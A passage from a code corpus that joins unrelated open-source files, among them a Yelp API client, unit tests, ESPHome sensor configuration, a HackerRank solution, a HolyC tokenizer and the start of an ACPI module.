pass
ClassB().method(1, arg2=2)
|
third_party/atlas/workspace.bzl
|
jzjonah/apollo
| 22,688 |
117017
|
<reponame>jzjonah/apollo<gh_stars>1000+
"""Loads the atlas library"""
# Sanitize a dependency so that it works correctly from code that includes
# Apollo as a submodule.
def clean_dep(dep):
return str(Label(dep))
# Installed via atlas-dev
def repo():
# atlas
native.new_local_repository(
name = "atlas",
build_file = clean_dep("//third_party/atlas:atlas.BUILD"),
path = "/usr/include", # /usr/include/$(uname -m)-linux-gnu
)
|
yelp/client.py
|
ricwillis98/yelp-python
| 195 |
117026
|
<reponame>ricwillis98/yelp-python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import unicode_literals
import requests
import six
from yelp.config import API_ROOT_URL
from yelp.endpoint.business import BusinessEndpoints
from yelp.errors import YelpError
class Client(object):
def __init__(self, api_key):
self._session = requests.Session()
self._session.headers.update(self._get_auth_header(api_key))
# Add endpoints to this client. Then they will be accessed e.g.
# client.business.get_by_id('yelp-san-francisco')
self.business = BusinessEndpoints(self)
def _make_request(self, path, url_params=None):
url_params = url_params if url_params is not None else {}
url = "{}{}".format(
API_ROOT_URL, six.moves.urllib.parse.quote(path.encode("utf-8"))
)
response = self._session.get(url, params=url_params)
if response.status_code == 200:
return response.json()
else:
raise YelpError.from_response(response)
def _get_auth_header(self, api_key):
return {"Authorization": "Bearer {api_key}".format(api_key=api_key)}
|
tests/test_save.py
|
jinwyp/image-background-remove-tool
| 585 |
117034
|
<filename>tests/test_save.py
"""
Name: tests
Description: This file contains the test code
Version: [release][3.2]
Source url: https://github.com/OPHoperHPO/image-background-remove-tool
Author: Anodev (OPHoperHPO)[https://github.com/OPHoperHPO] .
License: Apache License 2.0
License:
Copyright 2020 OPHoperHPO
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from main import __save_image_file__
import os
import shutil
import unittest
import random
from PIL import Image
def new_name():
filename = str(random.randint(0, 1202)) + ".jpg"
return filename
def save():
path = "tests/tests_temp/save_test/"
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "dir") # Dir mode
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "file") # File name empty base name
a = None
f = new_name()
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "file") # Extension Exception
except OSError:
a = True
if a:
a = False
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "dir") # Not dir error
except OSError as e:
a = True
if a:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f + '.png',
"file") # filename png test
else:
return False
else:
return False
shutil.rmtree(path)
return True
class SaveTest(unittest.TestCase):
def test_save(self):
self.assertEqual(save(), True)
if __name__ == '__main__':
unittest.main()
|
Lib/objc/_CloudPhotoLibrary.py
|
snazari/Pyto
| 701 |
117078
|
"""
Classes from the 'CloudPhotoLibrary' framework.
"""
try:
from rubicon.objc import ObjCClass
except ValueError:
def ObjCClass(name):
return None
def _Class(name):
try:
return ObjCClass(name)
except NameError:
return None
CPLDateFormatter = _Class("CPLDateFormatter")
CPLPlatform = _Class("CPLPlatform")
CPLChangeBatch = _Class("CPLChangeBatch")
CPLNetworkIndicator = _Class("CPLNetworkIndicator")
CPLChangeSessionContext = _Class("CPLChangeSessionContext")
CPLExtractedBatch = _Class("CPLExtractedBatch")
CPLMomentShareParticipant = _Class("CPLMomentShareParticipant")
CPLRejectedRecords = _Class("CPLRejectedRecords")
_CPLScheduledOverride = _Class("_CPLScheduledOverride")
CPLEngineSystemMonitor = _Class("CPLEngineSystemMonitor")
_CPLForcedSyncHistory = _Class("_CPLForcedSyncHistory")
CPLEngineSyncManager = _Class("CPLEngineSyncManager")
_CPLEngineSyncLastError = _Class("_CPLEngineSyncLastError")
_CPLTransientStatus = _Class("_CPLTransientStatus")
CPLFeatureVersionHistory = _Class("CPLFeatureVersionHistory")
_CPLOptimisticIDMapping = _Class("_CPLOptimisticIDMapping")
CPLMomentShare = _Class("CPLMomentShare")
CPLBatteryMonitor = _Class("CPLBatteryMonitor")
CPLFeature = _Class("CPLFeature")
CPLMomentShareFeature = _Class("CPLMomentShareFeature")
CPLPushChangeTasks = _Class("CPLPushChangeTasks")
CPLEngineFeedbackManager = _Class("CPLEngineFeedbackManager")
CPLSyncStep = _Class("CPLSyncStep")
CPLPullFromTransportSyncStep = _Class("CPLPullFromTransportSyncStep")
CPLSimpleTaskSyncStep = _Class("CPLSimpleTaskSyncStep")
CPLPushToTransportSyncStep = _Class("CPLPushToTransportSyncStep")
CPLEngineComponentEnumerator = _Class("CPLEngineComponentEnumerator")
CPLEngineLibrary = _Class("CPLEngineLibrary")
CPLPushSessionTracker = _Class("CPLPushSessionTracker")
CPLFileWatcher = _Class("CPLFileWatcher")
CPLSyncIndicator = _Class("CPLSyncIndicator")
CPLRecordChangeDiffTracker = _Class("CPLRecordChangeDiffTracker")
CPLContainerRelation = _Class("CPLContainerRelation")
CPLLibraryState = _Class("CPLLibraryState")
CPLLibraryInfo = _Class("CPLLibraryInfo")
CPLBatchExtractionStep = _Class("CPLBatchExtractionStep")
CPLTrashedAssetExtractionStep = _Class("CPLTrashedAssetExtractionStep")
CPLNewAssetExtractionStep = _Class("CPLNewAssetExtractionStep")
CPLDeleteAlbumExtractionStep = _Class("CPLDeleteAlbumExtractionStep")
CPLNewAlbumExtractionStep = _Class("CPLNewAlbumExtractionStep")
CPLByClassExtractionStep = _Class("CPLByClassExtractionStep")
CPLRecordStorageView = _Class("CPLRecordStorageView")
CPLClientCacheBaseView = _Class("CPLClientCacheBaseView")
CPLChangedRecordStorageView = _Class("CPLChangedRecordStorageView")
CPLChangeStorage = _Class("CPLChangeStorage")
CPLChangeBatchChangeStorage = _Class("CPLChangeBatchChangeStorage")
CPLUnacknowledgedChangeStorage = _Class("CPLUnacknowledgedChangeStorage")
CPLPushRepositoryStorage = _Class("CPLPushRepositoryStorage")
CPLDiffTracker = _Class("CPLDiffTracker")
CPLCodingPropertyEntry = _Class("CPLCodingPropertyEntry")
CPLResource = _Class("CPLResource")
CPLLibraryManager = _Class("CPLLibraryManager")
_CPLWeakLibraryManager = _Class("_CPLWeakLibraryManager")
CPLActiveDownloadQueue = _Class("CPLActiveDownloadQueue")
CPLSimpleMergeHelper = _Class("CPLSimpleMergeHelper")
CPLSimpleMerger = _Class("CPLSimpleMerger")
CPLRecordStatus = _Class("CPLRecordStatus")
CPLScopedIdentifier = _Class("CPLScopedIdentifier")
CPLShare = _Class("CPLShare")
CPLErrors = _Class("CPLErrors")
CPLConfiguration = _Class("CPLConfiguration")
CPLDerivativesFilter = _Class("CPLDerivativesFilter")
CPLEngineDerivativesCache = _Class("CPLEngineDerivativesCache")
_CPLResourcesMutableArray = _Class("_CPLResourcesMutableArray")
CPLChangeSession = _Class("CPLChangeSession")
CPLPushChangeSession = _Class("CPLPushChangeSession")
CPLPullChangeSession = _Class("CPLPullChangeSession")
CPLScopeFilter = _Class("CPLScopeFilter")
_CPLEngineScopeCache = _Class("_CPLEngineScopeCache")
CPLEngineScheduler = _Class("CPLEngineScheduler")
CPLTransaction = _Class("CPLTransaction")
CPLStatus = _Class("CPLStatus")
CPLResetReason = _Class("CPLResetReason")
CPLResetTracker = _Class("CPLResetTracker")
CPLPlaceAnnotation = _Class("CPLPlaceAnnotation")
CPLEngineScopeFlagsUpdate = _Class("CPLEngineScopeFlagsUpdate")
CPLEngineScope = _Class("CPLEngineScope")
CPLEngineTransport = _Class("CPLEngineTransport")
CPLResourceIdentity = _Class("CPLResourceIdentity")
CPLResourceIdentityImplementation = _Class("CPLResourceIdentityImplementation")
CPLShareParticipant = _Class("CPLShareParticipant")
CPLBatchExtractionStrategy = _Class("CPLBatchExtractionStrategy")
CPLChangeSessionUpdate = _Class("CPLChangeSessionUpdate")
CPLPullSessionScopesAcknowledgement = _Class("CPLPullSessionScopesAcknowledgement")
CPLPullSessionUpdate = _Class("CPLPullSessionUpdate")
CPLPushSessionUpdate = _Class("CPLPushSessionUpdate")
CPLPersonReference = _Class("CPLPersonReference")
CPLRecordChange = _Class("CPLRecordChange")
CPLFaceCropChange = _Class("CPLFaceCropChange")
CPLPersonChange = _Class("CPLPersonChange")
CPLContainerRelationChange = _Class("CPLContainerRelationChange")
CPLContainerChange = _Class("CPLContainerChange")
CPLAlbumChange = _Class("CPLAlbumChange")
CPLMemoryChange = _Class("CPLMemoryChange")
CPLScopeChange = _Class("CPLScopeChange")
CPLMomentShareScopeChange = _Class("CPLMomentShareScopeChange")
CPLItemChange = _Class("CPLItemChange")
CPLAssetChange = _Class("CPLAssetChange")
CPLMasterChange = _Class("CPLMasterChange")
CPLSuggestionChange = _Class("CPLSuggestionChange")
CPLFileStorageItem = _Class("CPLFileStorageItem")
CPLEngineFileStorage = _Class("CPLEngineFileStorage")
CPLNetworkState = _Class("CPLNetworkState")
CPLNetworkWatcher = _Class("CPLNetworkWatcher")
CPLSyncSession = _Class("CPLSyncSession")
CPLPowerAssertion = _Class("CPLPowerAssertion")
_CPLTimingStatistic = _Class("_CPLTimingStatistic")
CPLEngineWriteTransactionBlocker = _Class("CPLEngineWriteTransactionBlocker")
_CPLEngineStoreBatchedTransaction = _Class("_CPLEngineStoreBatchedTransaction")
CPLEngineStoreTransaction = _Class("CPLEngineStoreTransaction")
CPLEngineStore = _Class("CPLEngineStore")
CPLEngineSyncTask = _Class("CPLEngineSyncTask")
CPLBackgroundDownloadsTask = _Class("CPLBackgroundDownloadsTask")
CPLCleanupTask = _Class("CPLCleanupTask")
CPLMinglePulledChangesTask = _Class("CPLMinglePulledChangesTask")
CPLPullScopesTask = _Class("CPLPullScopesTask")
CPLEngineScopedTask = _Class("CPLEngineScopedTask")
CPLPullFromTransportScopeTask = _Class("CPLPullFromTransportScopeTask")
CPLScopeUpdateScopeTask = _Class("CPLScopeUpdateScopeTask")
CPLPushToTransportScopeTask = _Class("CPLPushToTransportScopeTask")
CPLTransportUpdateScopeTask = _Class("CPLTransportUpdateScopeTask")
CPLEngineMultiscopeSyncTask = _Class("CPLEngineMultiscopeSyncTask")
CPLPullFromTransportTask = _Class("CPLPullFromTransportTask")
CPLScopeUpdateTask = _Class("CPLScopeUpdateTask")
CPLPushToTransportTask = _Class("CPLPushToTransportTask")
CPLTransportUpdateTask = _Class("CPLTransportUpdateTask")
_CPLPruneRequestCounter = _Class("_CPLPruneRequestCounter")
CPLEngineStorage = _Class("CPLEngineStorage")
CPLEngineInitialQueryTracker = _Class("CPLEngineInitialQueryTracker")
CPLEngineOutgoingResources = _Class("CPLEngineOutgoingResources")
CPLEngineQuarantinedRecords = _Class("CPLEngineQuarantinedRecords")
CPLEngineStatusCenter = _Class("CPLEngineStatusCenter")
CPLEngineCloudCache = _Class("CPLEngineCloudCache")
CPLEngineRemappedDeletes = _Class("CPLEngineRemappedDeletes")
CPLEngineTransientRepository = _Class("CPLEngineTransientRepository")
CPLEngineChangePipe = _Class("CPLEngineChangePipe")
CPLEngineScopeCleanupTasks = _Class("CPLEngineScopeCleanupTasks")
CPLEngineScopeStorage = _Class("CPLEngineScopeStorage")
CPLEngineResourceDownloadQueue = _Class("CPLEngineResourceDownloadQueue")
CPLEngineIDMapping = _Class("CPLEngineIDMapping")
CPLEnginePushRepository = _Class("CPLEnginePushRepository")
CPLEngineResourceStorage = _Class("CPLEngineResourceStorage")
CPLRecordView = _Class("CPLRecordView")
CPLClientCacheRecordView = _Class("CPLClientCacheRecordView")
CPLChangedRecordView = _Class("CPLChangedRecordView")
CPLSimpleRecordView = _Class("CPLSimpleRecordView")
CPLSerializedFeedbackMessage = _Class("CPLSerializedFeedbackMessage")
CPLFeedbackMessage = _Class("CPLFeedbackMessage")
CPLInfoFeedbackMessage = _Class("CPLInfoFeedbackMessage")
CPLResetFeedbackMessage = _Class("CPLResetFeedbackMessage")
CPLQuarantineFeedbackMessage = _Class("CPLQuarantineFeedbackMessage")
CPLSettingFeedbackMessage = _Class("CPLSettingFeedbackMessage")
CPLExpungeableResourceState = _Class("CPLExpungeableResourceState")
CPLAdjustments = _Class("CPLAdjustments")
CPLResourceTransferTask = _Class("CPLResourceTransferTask")
CPLEngineResourceUploadTask = _Class("CPLEngineResourceUploadTask")
CPLInMemoryResourceDownloadTask = _Class("CPLInMemoryResourceDownloadTask")
CPLEngineResourceDownloadTask = _Class("CPLEngineResourceDownloadTask")
CPLProxyResourceTransferTask = _Class("CPLProxyResourceTransferTask")
CPLForceSyncTask = _Class("CPLForceSyncTask")
CPLEngineForceSyncTask = _Class("CPLEngineForceSyncTask")
CPLEngineBackupSyncTask = _Class("CPLEngineBackupSyncTask")
CPLProxyForceSyncTask = _Class("CPLProxyForceSyncTask")
CPLProxyLibraryManagerSyncOutstandingInvocation = _Class(
"CPLProxyLibraryManagerSyncOutstandingInvocation"
)
CPLProxyLibraryManagerOutstandingInvocation = _Class(
"CPLProxyLibraryManagerOutstandingInvocation"
)
CPLPlatformObject = _Class("CPLPlatformObject")
CPLProxySession = _Class("CPLProxySession")
CPLProxyPushSession = _Class("CPLProxyPushSession")
CPLProxyPullSession = _Class("CPLProxyPullSession")
CPLProxyLibraryManager = _Class("CPLProxyLibraryManager")
CPLSuggestionAssetList = _Class("CPLSuggestionAssetList")
CPLServerFeedbackMessage = _Class("CPLServerFeedbackMessage")
CPLMemoryAssetList = _Class("CPLMemoryAssetList")
CPLRampingResponse = _Class("CPLRampingResponse")
CPLServerFeedbackResponse = _Class("CPLServerFeedbackResponse")
CPLMemoryAssetFlag = _Class("CPLMemoryAssetFlag")
CPLSuggestionAsset = _Class("CPLSuggestionAsset")
CPLSuggestionAssetFlag = _Class("CPLSuggestionAssetFlag")
CPLFaceInstance = _Class("CPLFaceInstance")
CPLRampingRequestResource = _Class("CPLRampingRequestResource")
CPLAccountFlags = _Class("CPLAccountFlags")
CPLServerFeedbackKeyAndValue = _Class("CPLServerFeedbackKeyAndValue")
CPLMemoryAsset = _Class("CPLMemoryAsset")
CPLMomentSharePreviewData = _Class("CPLMomentSharePreviewData")
CPLFaceAnalysis = _Class("CPLFaceAnalysis")
CPLFaceAnalysisReference = _Class("CPLFaceAnalysisReference")
CPLRampingResponseResource = _Class("CPLRampingResponseResource")
CPLServerFeedbackRequest = _Class("CPLServerFeedbackRequest")
CPLRampingRequest = _Class("CPLRampingRequest")
CPLArchiver = _Class("CPLArchiver")
CPLAssetKeywordSortDescriptor = _Class("CPLAssetKeywordSortDescriptor")
|
interview-preparation-kit/minimum-time-required.py
|
gajubadge11/HackerRank-1
| 340 |
117103
|
<filename>interview-preparation-kit/minimum-time-required.py
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
def calculate_days(day, cnt):
res = 0
for el in cnt.items():
res += el[1] * (day // el[0])
return res
# Complete the minTime function below.
def minTime(machines, goal):
cnt = Counter(machines)
day_limit = 10**13
curgoal = 0
curday = 0
res = 0
prev_big = day_limit
prev_low = 0
curday = day_limit // 2
while True:
# detect if we are bouncing around in a loop
if curday == prev_big or curday == prev_low:
#print("curday = {} prev_low = {} prev_big = {}".format(curday, prev_low, prev_big))
prev_low_res = calculate_days(prev_low, cnt)
prev_big_res = calculate_days(prev_big, cnt)
if prev_low_res >= goal:
return prev_low
else:
return prev_big
curgoal = calculate_days(curday, cnt)
if curgoal < goal:
prev_low = curday
#print("micro curday = {} curgoal = {} < {}, diff = {}".format(curday, curgoal, goal, abs(curgoal - goal)))
curday = curday + (1 + day_limit - curday)//2
res = curday
else:
#print("micro curday = {} curgoal = {} > {}, diff = {}".format(curday, curgoal, goal, abs(curgoal - goal)))
prev_big = curday
day_limit = curday
curday = curday // 2
res = curday
return res
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
nGoal = input().split()
n = int(nGoal[0])
goal = int(nGoal[1])
machines = list(map(int, input().rstrip().split()))
ans = minTime(machines, goal)
fptr.write(str(ans) + '\n')
fptr.close()
|
tests/unit/test_nova_client.py
|
abdullahzamanbabar/syntribos
| 277 |
117152
|
# Copyright 2016 Intel
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import testtools
from syntribos.extensions.nova import client
from syntribos.utils.config_fixture import ConfFixture
class Content(object):
id = 1234
class _Fakeserver(object):
"""Fake nova client object."""
def create(*args, **kwargs):
return Content()
def list(data):
return []
class _FakeHypervisor(object):
def list(data):
return [Content()]
class _FakeAggregates(object):
def create(*args, **kwargs):
return Content()
def list(data):
return []
class _FakeStorage(object):
"""Fake storage client."""
servers = _Fakeserver() # noqa
hypervisors = _FakeHypervisor() # noqa
aggregates = _FakeAggregates() # noqa
def fake_get_client():
return _FakeStorage()
class TestNovaClientCreateResources(testtools.TestCase):
"""Tests all getter methods for nova extension client."""
@mock.patch(
"syntribos.extensions.nova.client._get_client",
side_effect=fake_get_client)
def test_get_hypervisor_id(self, get_client_fn):
self.useFixture(ConfFixture())
self.assertEqual(1234, client.get_hypervisor_id())
@mock.patch(
"syntribos.extensions.nova.client._get_client",
side_effect=fake_get_client)
def test_get_aggregate_id(self, get_client_fn):
self.useFixture(ConfFixture())
self.assertEqual(1234, client.get_aggregate_id())
|
esphome/components/zyaura/sensor.py
|
OttoWinter/esphomeyaml
| 249 |
117170
|
import esphome.codegen as cg
import esphome.config_validation as cv
from esphome import pins
from esphome.components import sensor
from esphome.const import (
CONF_ID,
CONF_CLOCK_PIN,
CONF_DATA_PIN,
CONF_CO2,
CONF_TEMPERATURE,
CONF_HUMIDITY,
DEVICE_CLASS_CARBON_DIOXIDE,
DEVICE_CLASS_HUMIDITY,
DEVICE_CLASS_TEMPERATURE,
STATE_CLASS_MEASUREMENT,
UNIT_PARTS_PER_MILLION,
UNIT_CELSIUS,
UNIT_PERCENT,
ICON_MOLECULE_CO2,
)
from esphome.cpp_helpers import gpio_pin_expression
zyaura_ns = cg.esphome_ns.namespace("zyaura")
ZyAuraSensor = zyaura_ns.class_("ZyAuraSensor", cg.PollingComponent)
CONFIG_SCHEMA = cv.Schema(
{
cv.GenerateID(): cv.declare_id(ZyAuraSensor),
cv.Required(CONF_CLOCK_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Required(CONF_DATA_PIN): cv.All(pins.internal_gpio_input_pin_schema),
cv.Optional(CONF_CO2): sensor.sensor_schema(
unit_of_measurement=UNIT_PARTS_PER_MILLION,
icon=ICON_MOLECULE_CO2,
accuracy_decimals=0,
device_class=DEVICE_CLASS_CARBON_DIOXIDE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_TEMPERATURE): sensor.sensor_schema(
unit_of_measurement=UNIT_CELSIUS,
accuracy_decimals=1,
device_class=DEVICE_CLASS_TEMPERATURE,
state_class=STATE_CLASS_MEASUREMENT,
),
cv.Optional(CONF_HUMIDITY): sensor.sensor_schema(
unit_of_measurement=UNIT_PERCENT,
accuracy_decimals=1,
device_class=DEVICE_CLASS_HUMIDITY,
state_class=STATE_CLASS_MEASUREMENT,
),
}
).extend(cv.polling_component_schema("60s"))
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
pin_clock = await gpio_pin_expression(config[CONF_CLOCK_PIN])
cg.add(var.set_pin_clock(pin_clock))
pin_data = await gpio_pin_expression(config[CONF_DATA_PIN])
cg.add(var.set_pin_data(pin_data))
if CONF_CO2 in config:
sens = await sensor.new_sensor(config[CONF_CO2])
cg.add(var.set_co2_sensor(sens))
if CONF_TEMPERATURE in config:
sens = await sensor.new_sensor(config[CONF_TEMPERATURE])
cg.add(var.set_temperature_sensor(sens))
if CONF_HUMIDITY in config:
sens = await sensor.new_sensor(config[CONF_HUMIDITY])
cg.add(var.set_humidity_sensor(sens))
|
samples/python/15.handling-attachments/bots/__init__.py
|
Aliacf21/BotBuilder-Samples
| 1,998 |
117216
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .attachments_bot import AttachmentsBot
__all__ = ["AttachmentsBot"]
|
src/scripts/merge_pandas_conll.py
|
acoli-repo/OpenIE_Stanovsky_Dagan
| 117 |
117220
|
""" Usage:
merge_pandas_conll --out=OUTPUT_FN <filenames>...
Merge a list of data frames in csv format and print to output file.
"""
from docopt import docopt
import pandas as pd
import logging
logging.basicConfig(level = logging.DEBUG)
if __name__ == "__main__":
args = docopt(__doc__)
logging.debug(args)
input_fns = args["<filenames>"]
out_fn = args["--out"]
pd.concat([pd.read_csv(fn,
sep = '\t',
header = 0)
for fn in input_fns]).to_csv(out_fn,
sep = '\t',
header = True,
index = False)
|
example/example_puredp.py
|
samellem/autodp
| 158 |
117226
|
from autodp.mechanism_zoo import PureDP_Mechanism
from autodp.transformer_zoo import Composition
# Example: pure DP mechanism and composition of it
eps = 0.3
mech = PureDP_Mechanism(eps, name='Laplace')
import matplotlib.pyplot as plt
fpr_list, fnr_list = mech.plot_fDP()
plt.figure(1)
plt.plot(fpr_list,fnr_list,label='fdp_of_laplace')
delta = 1e-6
epslist = [mech.get_approxDP(delta)]
# declare a transformation to handle composition
compose = Composition()
for i in range(2,11):
mech_composed = compose([mech], [i])
epslist.append(mech_composed.get_approxDP(delta))
fpr_list, fnr_list = mech_composed.plot_fDP()
plt.plot(fpr_list, fnr_list, label='fdp_of_'+str(i)+'laplace')
plt.legend()
plt.xlabel('Type I error')
plt.ylabel('Type II error')
plt.show()
# we could specify parameters of the composition, e.g. using RDP composition, using KOV and so on
plt.figure(2)
plt.plot(range(1,11),epslist)
plt.xlabel('number of times compose')
plt.ylabel(r'$\epsilon$ at $\delta = 1e-6$')
plt.show()
|
secularize/token.py
|
PlutNom/HolyC-for-Linux
| 266 |
117305
|
from json import load, dumps
from .utils import populate_ast
class TokenStream(object):
def __init__(self, input_):
self.input = input_
self.current = None
self.keywords = 'if then else true false'.split()
self.datatypes = ['U0', 'U8', 'U16', 'U32', 'U64',
'I8', 'I16', 'I32', 'I64', 'F64']
self.tokens = list()
self.direct_trans = {
'Print': 'printf',
'U0': 'void',
'U8': 'unsigned char',
'U16': 'unsigned short',
'U32': 'unsigned int',
'U64': 'unsigned long',
'I8': 'char',
'I16': 'short',
'I32': 'int',
'I64': 'long',
'F64': 'double'
}
def croak(self, message):
return self.input.croak(message + f'{dumps(self.tokens, indent=2)}')
def is_keyword(self, word):
return word in self.keywords
def is_datatype(self, word):
return word in self.datatypes
def is_digit(self, ch):
try:
int(ch)
return True
except (ValueError, TypeError):
return False
def is_id_start(self, ch):
try:
return ch.isalpha()
except AttributeError:
return False
def is_id(self, ch):
return self.is_id_start(ch) or ch in '?!-<>=0123456789'
def is_op_char(self, ch):
return ch in '+-*/%=&|<>!'
def is_punc(self, ch):
return ch in ',;(){}[]'
def is_whitespace(self, ch):
return ch in ' _\t_\n'.split('_')
def is_being_declared(self):
return self.tokens and self.tokens[-1].get('type') != 'datatype'
def is_not_builtin(self, id_):
return id_ not in self.direct_trans
def read_while(self, predicate):
string = str()
while not self.input.eof() and predicate(self.input.peek()):
string += self.input.next()
return string
def read_while_prev(self, predicate):
string = str()
line = self.input.line
col = self.input.col
while not self.input.bof() and predicate(self.input.peek_prev()):
string += self.input.prev()
self.input.line = line
self.input.col = col
return string[::-1]
def read_number(self):
has_dot = False
def anon(ch, has_dot):
if ch == '.':
if (has_dot):
return False
has_dot = True
return True
return self.is_digit(ch)
number = self.read_while(lambda ch: anon(ch, has_dot))
try:
number = int(number)
except ValueError:
number = float(number)
self.tokens.append({
'type': 'num',
'value': number
})
return self.tokens[-1]
def read_function(self, name, prog, type_=['int']):
coord = f'{self.input.filename}:{self.input.line}'
return populate_ast(self, 'funcdef', **{
'coord': coord,
'body.coord': coord,
'body.block_items': prog,
'decl.name': name,
'decl.coord': coord,
'decl.type.coord': coord,
'decl.type.type.coord': coord,
'decl.type.type.declname': name,
'decl.type.type.type.names': type_,
'decl.type.type.type.coord': coord
})
def read_ident(self):
coord = f'{self.input.filename}:{self.input.line}'
id_ = self.read_while(self.is_id)
type_ = str()
# print(f'id: {id_}')
if self.is_keyword(id_):
type_ = 'kw'
elif self.is_datatype(id_):
type_ = 'datatype'
self.direct_trans[f'{id_}*'] = f'{self.direct_trans[id_]}*'
maybe_pointer = self.read_while(lambda ch: ch in [' ', '*'])\
.replace(' ', str())
if maybe_pointer:
id_ += maybe_pointer
elif self.is_being_declared() and self.is_not_builtin(id_):
# print(f"creating var out of {id_}")
return populate_ast(self, 'id', **{
'name': id_,
'coord': coord
})
else:
# function definition
if self.tokens and self.tokens[-1].get('type') == 'datatype' and\
self.peek()['value'] == '(':
return self.read_function(id_, list())
# function call
if self.peek()['value'] == '(':
return populate_ast(self, 'funccall', **{
'coord': coord,
'name.name': self.direct_trans.get(id_, id_),
'name.coord': coord,
'args.coord': coord,
'args.exprs.coord': coord
})
# function/variable declaration
return populate_ast(self, 'decl', **{
'name': id_,
'coord': coord,
'type.declname': id_,
'type.coord': coord,
'type.type.names': list(),
'type.type.coord': coord,
'init.coord': coord
})
self.tokens.append({
'type': type_,
'value': self.direct_trans.get(id_, id_)
})
return self.tokens[-1]
def read_escaped(self, end):
escaped = False
string = str()
self.input.next()
while not self.input.eof():
ch = self.input.next()
if ch == end:
break
string += ch
# if escaped:
# string += ch
# escaped = False
# elif ch == '\\':
# escaped = True
# elif ch == end:
# break
# else:
# string += ch
return f'"{string}"'
def read_string(self):
self.tokens.append({
"_nodetype": "Constant",
"type": "string",
"value": self.read_escaped('"'),
"coord": "examples/math.c:3:16"
})
# print(f'found string: {self.tokens[-1]}')
# self.tokens.append({
# 'type': 'str',
# 'value': self.read_escaped('"')
# })
return self.tokens[-1]
def skip_comment(self):
self.read_while(lambda ch: ch != "\n")
self.input.next()
def read_next(self):
self.read_while(self.is_whitespace)
if self.input.eof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens[-1]
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def read_prev(self):
self.read_while_prev(self.is_whitespace)
if self.input.bof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def peek(self):
if self.current:
return self.current
self.current = self.read_next()
return self.current
def next(self):
tok = self.current
self.current = None
return tok or self.read_next()
def prev(self):
return self.read_prev()
def eof(self):
return self.peek() is None
|
python/acpi.py
|
3mdeb/bits
| 215 |
117319
|
<gh_stars>100-1000
# Copyright (c) 2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""ACPI module."""
import _acpi
import bits
import bits.cdata
import bits.pyfs
import bitfields
from cpudetect import cpulib
from collections import OrderedDict
import copy
from cStringIO import StringIO
import ctypes
from ctypes import *
import itertools
import os
import string
import struct
import ttypager
import unpack
def _id(v):
return v
class TableParseException(Exception): pass
class AcpiBuffer(str):
def __repr__(self):
return "AcpiBuffer(" + ' '.join("{:02x}".format(ord(c)) for c in self) + ")"
def __str__(self):
return repr(self)
def display_resources(name):
with ttypager.page():
for r in get_objpaths(name):
raw_descriptor = evaluate(r)
